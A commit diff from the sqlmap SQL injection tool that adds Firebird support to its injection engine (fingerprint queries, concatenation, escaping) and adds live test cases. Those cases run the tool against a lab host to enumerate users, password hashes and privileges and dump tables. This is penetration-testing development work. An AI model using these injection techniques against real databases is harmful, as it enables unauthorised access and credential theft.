sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-03-03 19:55:47 +03:00
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of github.com:sqlmapproject/sqlmap

Browse Source
This commit is contained in:
Miroslav Stampar 2013-01-19 18:28:52 +01:00
commit 3f4c010370
14 changed files with 669 additions and 35 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
extra/shutils/regressiontest.py
View File

@ -26,7 +26,7 @@ SMTP_SERVER = "127.0.0.1"
SMTP_PORT = 25
SMTP_TIMEOUT = 30
FROM = "regressiontest@sqlmap.org"
TO = "dev@sqlmap.org"
TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"]
SUBJECT = "Regression test results on %s using revision %s" % (TIME, REVISION)
def prepare_email(content):
@ -87,18 +87,23 @@ def main():
test_counts.append(test_count)
console_output_fd = codecs.open(os.path.join(output_folder, "console_output"), "rb", "utf8")
console_output_file = os.path.join(output_folder, "console_output")
log_file = os.path.join(output_folder, "debiandev", "log")
traceback_file = os.path.join(output_folder, "traceback")
if os.path.exists(console_output_file):
console_output_fd = codecs.open(console_output_file, "rb", "utf8")
console_output = console_output_fd.read()
console_output_fd.close()
attachments[test_count] = str(console_output)
log_fd = codecs.open(os.path.join(output_folder, "debiandev", "log"), "rb", "utf8")
if os.path.exists(log_file):
log_fd = codecs.open(log_file, "rb", "utf8")
log = log_fd.read()
log_fd.close()
if traceback:
traceback_fd = codecs.open(os.path.join(output_folder, "traceback"), "rb", "utf8")
if os.path.exists(traceback_file):
traceback_fd = codecs.open(traceback_file, "rb", "utf8")
traceback = traceback_fd.read()
traceback_fd.close()

11
extra/shutils/regressiontest_cronjob.sh
View File

@ -6,9 +6,18 @@
SQLMAP_HOME="/opt/sqlmap"
REGRESSION_SCRIPT="${SQLMAP_HOME}/extra/shutils"
FROM="regressiontest@sqlmap.org"
TO="bernardo.damele@gmail.com, miroslav.stampar@gmail.com"
SUBJECT="Automated regression test failed on $(date)"
cd $SQLMAP_HOME
git pull
rm -f output 2>/dev/null
cd $REGRESSION_SCRIPT
python regressiontest.py
python regressiontest.py 1>/tmp/regressiontest.log 2>&1
if [ $? -ne 0 ]
then
cat /tmp/regressiontest.log | mailx -s "${SUBJECT}" -aFrom:${FROM} ${TO}
fi

6
lib/core/agent.py
View File

@ -535,7 +535,7 @@ class Agent(object):
elif fieldsNoSelect:
concatenatedQuery = "CONCAT('%s',%s,'%s')" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2):
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2, DBMS.FIREBIRD):
if fieldsExists:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
concatenatedQuery += "||'%s'" % kb.chars.stop
@ -822,8 +822,7 @@ class Agent(object):
limitedQuery += " %s" % limitStr
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
if " ORDER BY " in limitedQuery and "(SELECT " in limitedQuery:
orderBy = limitedQuery[limitedQuery.index(" ORDER BY "):]
if " ORDER BY " in limitedQuery and "SELECT " in limitedQuery:
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
if query.startswith("SELECT "):
@ -831,6 +830,7 @@ class Agent(object):
limitedQuery = "%s FROM (%s,%s" % (untilFrom, untilFrom.replace(delimiter, ','), limitStr)
else:
limitedQuery = "%s FROM (SELECT %s,%s" % (untilFrom, ','.join(f for f in field), limitStr)
limitedQuery = limitedQuery % fromFrom
limitedQuery += "=%d" % (num + 1)

1
lib/core/dump.py
View File

@ -175,6 +175,7 @@ class Dump(object):
for setting in settings:
self._write(" %s: %s" % (subHeader, setting))
if userSettings:
self.singleString("")
def dbs(self, dbs):

5
lib/core/testing.py
View File

@ -167,6 +167,9 @@ def liveTest():
result = runCase(switches, parse)
test_case_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "test_case"), "wb", UNICODE_ENCODING)
test_case_fd.write("%s\n" % name)
if result:
logger.info("test passed")
cleanCase()
@ -183,6 +186,7 @@ def liveTest():
errMsg += " - SQL injection not detected"
logger.error(errMsg)
test_case_fd.write("%s\n" % errMsg)
if failedParseOn:
console_output_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "console_output"), "wb", UNICODE_ENCODING)
@ -199,6 +203,7 @@ def liveTest():
if conf.stopFail is True:
return retVal
test_case_fd.close()
retVal &= bool(result)
dataToStdout("\n")

5
lib/techniques/error/use.py
View File

@ -23,6 +23,7 @@ from lib.core.common import incrementCounter
from lib.core.common import initTechnique
from lib.core.common import isListLike
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.common import listToStrValue
from lib.core.common import readInput
from lib.core.common import unArrayizeValue
@ -34,6 +35,7 @@ from lib.core.data import logger
from lib.core.data import queries
from lib.core.dicts import FROM_DUMMY_TABLE
from lib.core.enums import DBMS
from lib.core.enums import PAYLOAD
from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD
from lib.core.settings import MYSQL_ERROR_CHUNK_LENGTH
from lib.core.settings import MSSQL_ERROR_CHUNK_LENGTH
@ -180,6 +182,9 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e
else:
expressionReplaced = expression.replace(expressionFields, field, 1)
if kb.technique == PAYLOAD.TECHNIQUE.QUERY and Backend.isDbms(DBMS.FIREBIRD) and expressionReplaced.startswith("SELECT "):
expressionReplaced = "SELECT %s" % agent.concatQuery(expressionReplaced)
output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse(expressionReplaced, field)
if not kb.threadContinue:

3
plugins/dbms/firebird/fingerprint.py
View File

@ -74,6 +74,7 @@ class Fingerprint(GenericFingerprint):
("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")),
("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")),
("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")),
# TODO: add test for Firebird 2.5
)
for i in xrange(len(table)):
@ -122,7 +123,7 @@ class Fingerprint(GenericFingerprint):
logger.info(infoMsg)
randInt = randomInt()
result = inject.checkBooleanExpression("EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)" % (randInt, randInt))
result = inject.checkBooleanExpression("(SELECT COUNT(*) FROM RDB$DATABASE WHERE %d=%d)>0" % (randInt, randInt))
if result:
infoMsg = "confirming %s" % DBMS.FIREBIRD

3
plugins/dbms/firebird/syntax.py
View File

@ -16,6 +16,9 @@ class Syntax(GenericSyntax):
@staticmethod
def escape(expression, quote=True):
if isDBMSVersionAtLeast('2.1'):
if expression == u"'''":
return "ASCII_CHAR(%d)" % (ord("'"))
if quote:
while True:
index = expression.find("'")

2
plugins/dbms/mssqlserver/connector.py
View File

@ -41,7 +41,7 @@ class Connector(GenericConnector):
try:
self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout)
except pymssql.OperationalError, msg:
except (pymssql.InterfaceError, pymssql.OperationalError), msg:
raise SqlmapConnectionException(msg)
self.initCursor()

18
plugins/generic/databases.py
View File

@ -513,22 +513,24 @@ class Databases:
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
query += condQuery
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
query = rootQuery.inband.query % unsafeSQLIdentificatorNaming(tbl.upper())
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))
query += condQuery
elif Backend.isDbms(DBMS.MSSQL):
query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db,
conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
query += condQuery.replace("[DB]", conf.db)
elif Backend.isDbms(DBMS.SQLITE):
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD):
query = rootQuery.inband.query % tbl
values = inject.getValue(query, blind=False, time=False)
if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values):
index, values = 1, []
while True:
query = rootQuery.inband.query2 % (conf.db, tbl, index)
value = unArrayizeValue(inject.getValue(query, blind=False, time=False))
if isNoneValue(value) or value == " ":
break
else:
@ -591,7 +593,7 @@ class Databases:
query += condQuery
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(tbl.upper())
query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))
query += condQuery
elif Backend.isDbms(DBMS.MSSQL):
@ -639,7 +641,7 @@ class Databases:
query += condQuery
field = None
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
query = rootQuery.blind.query % unsafeSQLIdentificatorNaming(tbl.upper())
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))
query += condQuery
field = None
elif Backend.isDbms(DBMS.MSSQL):
@ -659,7 +661,7 @@ class Databases:
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column, unsafeSQLIdentificatorNaming(conf.db))
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column)
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column, unsafeSQLIdentificatorNaming(conf.db.upper()))
elif Backend.isDbms(DBMS.MSSQL):
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db,
conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
@ -736,7 +738,11 @@ class Databases:
db = db.upper()
table = table.upper()
if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
query = "SELECT %s FROM %s" % (queries[Backend.getIdentifiedDbms()].count.query % '*', safeSQLIdentificatorNaming(table, True))
else:
query = "SELECT %s FROM %s.%s" % (queries[Backend.getIdentifiedDbms()].count.query % '*', safeSQLIdentificatorNaming(db), safeSQLIdentificatorNaming(table, True))
count = inject.getValue(query, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if isNumPosStrValue(count):
@ -759,7 +765,7 @@ class Databases:
if not conf.db:
conf.db, conf.tbl = conf.tbl.split(".")
if conf.tbl is not None and conf.db is None:
if conf.tbl is not None and conf.db is None and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
warnMsg = "missing database parameter. sqlmap is going to "
warnMsg += "use the current database to retrieve the "
warnMsg += "number of entries for table '%s'" % unsafeSQLIdentificatorNaming(conf.tbl)

5
plugins/generic/search.py
View File

@ -29,6 +29,7 @@ from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import CURRENT_DB
from lib.core.settings import METADB_SUFFIX
from lib.request import inject
from lib.techniques.brute.use import columnExists
from lib.techniques.brute.use import tableExists
@ -199,7 +200,7 @@ class Search:
if isinstance(values, basestring):
values = [values]
for value in values:
newValues.append(["SQLite_masterdb", value])
newValues.append(["SQLite_%s" % METADB_SUFFIX, value])
values = newValues
@ -258,7 +259,7 @@ class Search:
if tblConsider == "2":
continue
else:
foundTbls["SQLite_masterdb"] = []
foundTbls["SQLite_%s" % METADB_SUFFIX] = []
for db in foundTbls.keys():
db = safeSQLIdentificatorNaming(db)

582
xml/livetests.xml
View File

@ -888,6 +888,217 @@
<item value="r'Database: SQLite_masterdb.+Table: users.+5 entries.+luther.+nameisnull.+'"/>
</parse>
</case>
<case name="Firebird boolean-based multi-threaded enumeration - all entries">
<switches>
<url value="http://debiandev/sqlmap/firebird/get_int.php?id=1"/>
<threads value="4"/>
<tech value="B"/>
<extensiveFp value="True"/>
<getBanner value="True"/>
<getCurrentUser value="True"/>
<getCurrentDb value="True"/>
<getHostname value="True"/>
<isDba value="True"/>
<getUsers value="True"/>
<getPasswordHashes value="True"/>
<getPrivileges value="True"/>
<getRoles value="True"/>
<getDbs value="True"/>
<getTables value="True"/>
<getColumns value="True"/>
<getCount value="True"/>
<dumpTable value="True"/>
<tbl value="users"/>
<excludeSysDbs value="True"/>
</switches>
<parse>
<item value="Title: AND boolean-based blind - WHERE or HAVING clause"/>
<item value="r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'"/>
<item value="banner: '2.5.0'"/>
<item value="current user: 'SYSDBA'"/>
<item value="r'current database: '/'"/>
<item value="current user is DBA: True"/>
<item value="r'database management system users \[.+PUBLIC.+SYSDBA'"/>
<item value="r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'"/>
<item value="r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'"/>
<item value="r'Database: Firebird_masterdb.+1 table.+USERS'"/>
<item value="r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'"/>
<item value="r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'"/>
<item value="r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'"/>
</parse>
</case>
<!-- TODO: this test case fails because of issue #358 -->
<case name="Firebird error-based multi-threaded enumeration - all entries">
<switches>
<url value="http://debiandev/sqlmap/firebird/get_int.php?id=1"/>
<threads value="4"/>
<tech value="E"/>
<extensiveFp value="True"/>
<getBanner value="True"/>
<getCurrentUser value="True"/>
<getCurrentDb value="True"/>
<getHostname value="True"/>
<isDba value="True"/>
<getUsers value="True"/>
<getPasswordHashes value="True"/>
<getPrivileges value="True"/>
<getRoles value="True"/>
<getDbs value="True"/>
<getTables value="True"/>
<getColumns value="True"/>
<getCount value="True"/>
<dumpTable value="True"/>
<tbl value="users"/>
</switches>
<parse>
<item value="Title: AND boolean-based blind - WHERE or HAVING clause"/>
<item value="r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'"/>
<item value="banner: '2.5.0'"/>
<item value="current user: 'SYSDBA'"/>
<item value="r'current database: '/'"/>
<item value="current user is DBA: True"/>
<item value="r'database management system users \[.+PUBLIC.+SYSDBA'"/>
<item value="r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'"/>
<item value="r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'"/>
<item value="r'Database: Firebird_masterdb.+1 table.+USERS'"/>
<item value="r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'"/>
<item value="r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'"/>
<item value="r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'"/>
</parse>
</case>
<!-- TODO: this test case fails because of issue #357 -->
<case name="Firebird UNION query multi-threaded enumeration - all entries">
<switches>
<url value="http://debiandev/sqlmap/firebird/get_int.php?id=1"/>
<threads value="4"/>
<tech value="U"/>
<extensiveFp value="True"/>
<getBanner value="True"/>
<getCurrentUser value="True"/>
<getCurrentDb value="True"/>
<getHostname value="True"/>
<isDba value="True"/>
<getUsers value="True"/>
<getPasswordHashes value="True"/>
<getPrivileges value="True"/>
<getRoles value="True"/>
<getDbs value="True"/>
<getTables value="True"/>
<getColumns value="True"/>
<getCount value="True"/>
<dumpTable value="True"/>
<tbl value="users"/>
</switches>
<parse>
<item value="Title: Generic UNION query (NULL) - 3 columns"/>
<item value="r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'"/>
<item value="banner: '2.5.0'"/>
<item value="current user: 'SYSDBA'"/>
<item value="r'current database: '/'"/>
<item value="current user is DBA: True"/>
<item value="r'database management system users \[.+PUBLIC.+SYSDBA'"/>
<item value="r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'"/>
<item value="r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'"/>
<item value="r'Database: Firebird_masterdb.+1 table.+USERS'"/>
<item value="r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'"/>
<item value="r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'"/>
<item value="r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'"/>
</parse>
</case>
<!-- TODO: this test case fails because of issue #357 -->
<case name="Firebird partial UNION query multi-threaded enumeration - all entries">
<switches>
<url value="http://debiandev/sqlmap/firebird/get_int_partialunion.php?id=1"/>
<threads value="4"/>
<tech value="U"/>
<extensiveFp value="True"/>
<getBanner value="True"/>
<getCurrentUser value="True"/>
<getCurrentDb value="True"/>
<getHostname value="True"/>
<isDba value="True"/>
<getUsers value="True"/>
<getPasswordHashes value="True"/>
<getPrivileges value="True"/>
<getRoles value="True"/>
<getDbs value="True"/>
<getTables value="True"/>
<getColumns value="True"/>
<getCount value="True"/>
<dumpTable value="True"/>
<tbl value="users"/>
</switches>
<parse>
<item value="Title: Generic UNION query (NULL) - 3 columns"/>
<item value="r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'"/>
<item value="banner: '2.5.0'"/>
<item value="current user: 'SYSDBA'"/>
<item value="r'current database: '/'"/>
<item value="current user is DBA: True"/>
<item value="r'database management system users \[.+PUBLIC.+SYSDBA'"/>
<item value="r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'"/>
<item value="r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'"/>
<item value="r'Database: Firebird_masterdb.+1 table.+USERS'"/>
<item value="r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'"/>
<item value="r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'"/>
<item value="r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'"/>
</parse>
</case>
<case name="Firebird time-based single-threaded enumeration - all entries">
<switches>
<url value="http://debiandev/sqlmap/firebird/get_int_nooutput.php?id=1"/>
<tech value="T"/>
<level value="4"/>
<risk value="2"/>
<timeSec value="2"/>
<getBanner value="True"/>
<isDba value="True"/>
</switches>
<parse>
<item value="Title: Firebird AND time-based blind (heavy query)"/>
<item value="banner: '2.5.0'"/>
<item value="current user is DBA: True"/>
</parse>
</case>
<case name="Firebird inline queries multi-threaded enumeration - all entries">
<switches>
<url value="http://debiandev/sqlmap/firebird/get_int_inline.php?id=1"/>
<threads value="4"/>
<tech value="Q"/>
<level value="2"/>
<extensiveFp value="True"/>
<getBanner value="True"/>
<getCurrentUser value="True"/>
<getCurrentDb value="True"/>
<getHostname value="True"/>
<isDba value="True"/>
<getUsers value="True"/>
<getPasswordHashes value="True"/>
<getPrivileges value="True"/>
<getRoles value="True"/>
<getDbs value="True"/>
<getTables value="True"/>
<getColumns value="True"/>
<getCount value="True"/>
<dumpTable value="True"/>
<tbl value="users"/>
</switches>
<parse>
<item value="Title: Firebird inline queries"/>
<item value="r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'"/>
<item value="banner: '2.5.0'"/>
<item value="current user: 'SYSDBA'"/>
<item value="r'current database: '/'"/>
<item value="current user is DBA: True"/>
<item value="r'database management system users \[.+PUBLIC.+SYSDBA'"/>
<item value="r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'"/>
<item value="r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'"/>
<item value="r'Database: Firebird_masterdb.+1 table.+USERS'"/>
<item value="r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'"/>
<item value="r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'"/>
<item value="r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'"/>
</parse>
</case>
<!-- End of common enumeration switches across all techniques -->
<!-- Custom enumeration switches -->
@ -1044,6 +1255,21 @@
<item value="r'Database: SYS.+Table: USERS.+5 entries.+the | iss.+&lt;blank&gt; | mei'"/>
</parse>
</case>
<case name="IBM DB2 boolean-based multi-threaded custom enumeration - substring">
<switches>
<url value="http://debiandev/sqlmap/db2/get_int.php?id=1"/>
<threads value="4"/>
<tech value="B"/>
<dumpTable value="True"/>
<db value="db2inst1"/>
<tbl value="users"/>
<firstChar value="3"/>
<lastChar value="5"/>
</switches>
<parse>
<item value="r'Database: DB2INST1.+Table: USERS.+5 entries.+the | iss.+NULL | mei'"/>
</parse>
</case>
<case name="SQLite UNION query multi-threaded custom enumeration">
<switches>
<url value="http://debiandev/sqlmap/sqlite/get_int.php?id=1"/>
@ -1671,6 +1897,294 @@
<item value="r'Database: information_schema.+Table: sql_parts.+1 column.+feature_name.+character_data'"/>
</parse>
</case>
<case name="Oracle boolean-based multi-threaded search enumeration - database">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="B"/>
<search value="True"/>
<db value="sys"/>
</switches>
<parse>
<item value="r'found databases.+:.+\[\*\] CTXSYS.+\[\*\] SYS.+\[\*\] TSMSYS'"/>
</parse>
</case>
<case name="Oracle error-based multi-threaded search enumeration - database">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="E"/>
<search value="True"/>
<db value="sys"/>
</switches>
<parse>
<item value="r'found databases.+:.+\[\*\] CTXSYS.+\[\*\] SYS.+\[\*\] TSMSYS'"/>
</parse>
</case>
<case name="Oracle UNION query multi-threaded search enumeration - database">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="U"/>
<search value="True"/>
<db value="sys"/>
</switches>
<parse>
<item value="r'found databases.+:.+\[\*\] CTXSYS.+\[\*\] SYS.+\[\*\] TSMSYS'"/>
</parse>
</case>
<case name="Oracle boolean-based multi-threaded search enumeration - tables given database">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="B"/>
<search value="True"/>
<db value="sys"/>
<tbl value="user,aux,wrong"/>
<answer value="do you want to dump tables=N,do you want to crack them via a dictionary-based attack=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+9 tables.+AUX_STATS.+USERS.+AUX_HISTORY'"/>
</parse>
</case>
<case name="Oracle error-based multi-threaded search enumeration - tables given database">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="E"/>
<search value="True"/>
<db value="sys"/>
<tbl value="user,aux,wrong"/>
<answer value="do you want to crack them via a dictionary-based attack=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+9 tables.+AUX_STATS.+USERS.+AUX_HISTORY'"/>
<item value="r'.+5 entries.+wu.+nameisnull'"/>
</parse>
</case>
<case name="Oracle UNION query multi-threaded search enumeration - tables given database">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="U"/>
<search value="True"/>
<db value="sys"/>
<tbl value="user,aux,wrong"/>
<answer value="do you want to crack them via a dictionary-based attack=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+9 tables.+AUX_STATS.+USERS.+AUX_HISTORY'"/>
<item value="r'.+5 entries.+wu.+nameisnull'"/>
</parse>
</case>
<case name="Oracle boolean-based multi-threaded search enumeration - tables without given database">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="B"/>
<search value="True"/>
<tbl value="users"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+1 table.+USERS.+Database: FLOWS_020100.+2 table.+WWV_FLOW_PICK_END_USERS'"/>
</parse>
</case>
<case name="Oracle error-based multi-threaded search enumeration - tables without given database">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="E"/>
<search value="True"/>
<tbl value="users"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+1 table.+USERS.+Database: FLOWS_020100.+2 table.+WWV_FLOW_PICK_END_USERS'"/>
</parse>
</case>
<case name="Oracle UNION query multi-threaded search enumeration - tables without given database">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="U"/>
<search value="True"/>
<tbl value="users"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+1 table.+USERS.+Database: FLOWS_020100.+2 table.+WWV_FLOW_PICK_END_USERS'"/>
</parse>
</case>
<case name="Oracle boolean-based multi-threaded search enumeration - column without given db or table">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="B"/>
<search value="True"/>
<col value="surname,foobar"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME'"/>
</parse>
</case>
<case name="Oracle error-based multi-threaded search enumeration - column without given db or table">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="E"/>
<search value="True"/>
<col value="surname,foobar"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
</parse>
</case>
<case name="Oracle UNION query multi-threaded search enumeration - column without given db or table">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="U"/>
<search value="True"/>
<col value="surname,foobar"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
</parse>
</case>
<case name="Oracle boolean-based multi-threaded search enumeration - column given databases">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="B"/>
<search value="True"/>
<db value="sys,foobar"/>
<col value="surname"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME'"/>
</parse>
</case>
<case name="Oracle error-based multi-threaded search enumeration - column given databases">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="E"/>
<search value="True"/>
<db value="sys,foobar"/>
<col value="surname"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
</parse>
</case>
<case name="Oracle UNION query multi-threaded search enumeration - column given databases">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="U"/>
<search value="True"/>
<db value="sys,foobar"/>
<col value="surname"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
</parse>
</case>
<case name="Oracle boolean-based multi-threaded search enumeration - column given tables">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="B"/>
<search value="True"/>
<tbl value="users,foobar"/>
<col value="surname"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME'"/>
</parse>
</case>
<case name="Oracle error-based multi-threaded search enumeration - column given tables">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="E"/>
<search value="True"/>
<tbl value="users,foobar"/>
<col value="surname"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
</parse>
</case>
<case name="Oracle UNION query multi-threaded search enumeration - column given tables">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="U"/>
<search value="True"/>
<tbl value="users,foobar"/>
<col value="surname"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
</parse>
</case>
<case name="Oracle boolean-based multi-threaded search enumeration - column given databases and table">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="B"/>
<search value="True"/>
<db value="sys,foobar"/>
<tbl value="users"/>
<col value="surname"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME'"/>
</parse>
</case>
<case name="Oracle error-based multi-threaded search enumeration - column given databases and table">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="E"/>
<search value="True"/>
<db value="sys,foobar"/>
<tbl value="users"/>
<col value="surname"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
